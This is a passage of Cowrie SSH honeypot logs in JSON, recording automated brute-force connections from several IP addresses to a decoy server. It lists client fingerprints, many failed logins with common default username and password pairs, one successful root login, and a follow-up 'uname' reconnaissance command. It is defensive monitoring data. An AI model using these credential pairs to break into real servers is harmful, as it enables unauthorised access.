0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:13:51.178406Z","src_ip":"41.226.27.251","session":"d81dd7929576"}
{"eventid":"cowrie.login.failed","username":"vagrant","password":"vagrant","message":"login attempt [vagrant/vagrant] failed","sensor":"my-vps","timestamp":"2025-08-31T03:13:51.364602Z","src_ip":"41.226.27.251","session":"d81dd7929576"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:13:52.694446Z","src_ip":"41.226.27.251","session":"d81dd7929576"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50130,"dst_ip":"1.2.3.4","dst_port":22,"session":"914fac08b192","protocol":"ssh","message":"New connection: 212.227.125.160:50130 (1.2.3.4:22) [session: 914fac08b192]","sensor":"my-vps","timestamp":"2025-08-31T03:13:54.244776Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:14:10.310377Z","src_ip":"212.227.125.160","session":"914fac08b192"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:14:10.311670Z","src_ip":"212.227.125.160","session":"914fac08b192"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":52034,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae5baf1673cf","protocol":"ssh","message":"New connection: 41.226.27.251:52034 (1.2.3.4:22) [session: ae5baf1673cf]","sensor":"my-vps","timestamp":"2025-08-31T03:14:11.203364Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:14:11.208699Z","src_ip":"41.226.27.251","session":"ae5baf1673cf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:14:11.251899Z","src_ip":"41.226.27.251","session":"ae5baf1673cf"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"123","message":"login attempt [esuser/123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:14:11.441167Z","src_ip":"41.226.27.251","session":"ae5baf1673cf"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:14:12.619556Z","src_ip":"41.226.27.251","session":"ae5baf1673cf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41502,"dst_ip":"1.2.3.4","dst_port":22,"session":"139d650294a0","protocol":"ssh","message":"New connection: 212.227.235.229:41502 (1.2.3.4:22) [session: 139d650294a0]","sensor":"my-vps","timestamp":"2025-08-31T03:14:13.661366Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:14:14.349463Z","src_ip":"212.227.235.229","session":"139d650294a0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:14:14.350135Z","src_ip":"212.227.235.229","session":"139d650294a0"}
{"eventid":"cowrie.login.failed","username":"git","password":"password","message":"login attempt [git/password] failed","sensor":"my-vps","timestamp":"2025-08-31T03:14:20.447311Z","src_ip":"212.227.235.229","session":"139d650294a0"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:14:22.330494Z","src_ip":"212.227.235.229","session":"139d650294a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37300,"dst_ip":"1.2.3.4","dst_port":22,"session":"591f21c001c9","protocol":"ssh","message":"New connection: 212.227.125.160:37300 (1.2.3.4:22) [session: 591f21c001c9]","sensor":"my-vps","timestamp":"2025-08-31T03:14:30.797473Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:14:30.798313Z","src_ip":"212.227.125.160","session":"591f21c001c9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:14:31.066169Z","src_ip":"212.227.125.160","session":"591f21c001c9"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":56944,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c6b0fa89103","protocol":"ssh","message":"New connection: 41.226.27.251:56944 (1.2.3.4:22) [session: 0c6b0fa89103]","sensor":"my-vps","timestamp":"2025-08-31T03:14:31.616021Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:14:31.617295Z","src_ip":"41.226.27.251","session":"0c6b0fa89103"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:14:31.662161Z","src_ip":"41.226.27.251","session":"0c6b0fa89103"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser","message":"login attempt [ftpuser/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-31T03:14:31.798862Z","src_ip":"41.226.27.251","session":"0c6b0fa89103"}
{"eventid":"cowrie.login.failed","username":"moodle","password":"1234","message":"login attempt [moodle/1234] failed","sensor":"my-vps","timestamp":"2025-08-31T03:14:32.173839Z","src_ip":"212.227.125.160","session":"591f21c001c9"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:14:33.102611Z","src_ip":"41.226.27.251","session":"0c6b0fa89103"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:14:33.442788Z","src_ip":"212.227.125.160","session":"591f21c001c9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47138,"dst_ip":"1.2.3.4","dst_port":22,"session":"78733c97b4b3","protocol":"ssh","message":"New connection: 212.227.235.229:47138 (1.2.3.4:22) [session: 78733c97b4b3]","sensor":"my-vps","timestamp":"2025-08-31T03:14:33.492001Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59934,"dst_ip":"1.2.3.4","dst_port":22,"session":"df0dea3ec1d4","protocol":"ssh","message":"New connection: 212.227.125.160:59934 (1.2.3.4:22) [session: df0dea3ec1d4]","sensor":"my-vps","timestamp":"2025-08-31T03:14:35.910910Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:14:36.379369Z","src_ip":"212.227.125.160","session":"df0dea3ec1d4"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:14:36.380135Z","src_ip":"212.227.125.160","session":"df0dea3ec1d4"}
{"eventid":"cowrie.login.success","username":"root","password":"4r3e2w1q","message":"login attempt [root/4r3e2w1q] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:14:36.711262Z","src_ip":"212.227.125.160","session":"914fac08b192"}
{"eventid":"cowrie.login.failed","username":"git","password":"password","message":"login attempt [git/password] failed","sensor":"my-vps","timestamp":"2025-08-31T03:14:38.445755Z","src_ip":"212.227.125.160","session":"df0dea3ec1d4"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:14:39.909779Z","src_ip":"212.227.125.160","session":"df0dea3ec1d4"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:14:43.169461Z","src_ip":"212.227.235.229","session":"78733c97b4b3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:14:43.243746Z","src_ip":"212.227.235.229","session":"78733c97b4b3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":63496,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e900dccb31e","protocol":"ssh","message":"New connection: 212.227.125.160:63496 (1.2.3.4:22) [session: 3e900dccb31e]","sensor":"my-vps","timestamp":"2025-08-31T03:14:48.530183Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T03:14:48.531191Z","src_ip":"212.227.125.160","session":"3e900dccb31e"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T03:14:48.611159Z","src_ip":"212.227.125.160","session":"3e900dccb31e"}
{"eventid":"cowrie.login.failed","username":"pritchard","password":"123456","message":"login attempt [pritchard/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:14:49.019229Z","src_ip":"212.227.125.160","session":"3e900dccb31e"}
{"eventid":"cowrie.login.failed","username":"pritchard","password":"abc123","message":"login attempt [pritchard/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:14:50.102224Z","src_ip":"212.227.125.160","session":"3e900dccb31e"}
{"eventid":"cowrie.login.failed","username":"pritchard","password":"abcd123","message":"login attempt [pritchard/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:14:51.184345Z","src_ip":"212.227.125.160","session":"3e900dccb31e"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":51808,"dst_ip":"1.2.3.4","dst_port":22,"session":"ede3f0d4cd29","protocol":"ssh","message":"New connection: 41.226.27.251:51808 (1.2.3.4:22) [session: ede3f0d4cd29]","sensor":"my-vps","timestamp":"2025-08-31T03:14:51.739017Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:14:51.790473Z","src_ip":"41.226.27.251","session":"ede3f0d4cd29"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:14:51.791226Z","src_ip":"41.226.27.251","session":"ede3f0d4cd29"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"esuser123","message":"login attempt [esuser/esuser123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:14:51.969583Z","src_ip":"41.226.27.251","session":"ede3f0d4cd29"}
{"eventid":"cowrie.login.failed","username":"pritchard","password":"abcd1234","message":"login attempt [pritchard/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-31T03:14:52.266651Z","src_ip":"212.227.125.160","session":"3e900dccb31e"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:14:53.292871Z","src_ip":"41.226.27.251","session":"ede3f0d4cd29"}
{"eventid":"cowrie.login.failed","username":"pritchard","password":"abc1234","message":"login attempt [pritchard/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-31T03:14:53.349163Z","src_ip":"212.227.125.160","session":"3e900dccb31e"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:14:54.432200Z","src_ip":"212.227.125.160","session":"3e900dccb31e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34912,"dst_ip":"1.2.3.4","dst_port":22,"session":"588391b1bf49","protocol":"ssh","message":"New connection: 212.227.125.160:34912 (1.2.3.4:22) [session: 588391b1bf49]","sensor":"my-vps","timestamp":"2025-08-31T03:14:54.702212Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:15:06.305113Z","src_ip":"79.124.8.120","session":"3b6b05b2030b"}
{"eventid":"cowrie.session.closed","duration":180.0654752254486,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:15:06.308093Z","src_ip":"79.124.8.120","session":"3b6b05b2030b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:15:06.454290Z","src_ip":"212.227.125.160","session":"914fac08b192"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:15:06.455011Z","src_ip":"212.227.125.160","session":"914fac08b192"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":41762,"dst_ip":"1.2.3.4","dst_port":22,"session":"ebdb68337fd6","protocol":"ssh","message":"New connection: 41.226.27.251:41762 (1.2.3.4:22) [session: ebdb68337fd6]","sensor":"my-vps","timestamp":"2025-08-31T03:15:12.273117Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:15:12.273790Z","src_ip":"41.226.27.251","session":"ebdb68337fd6"}
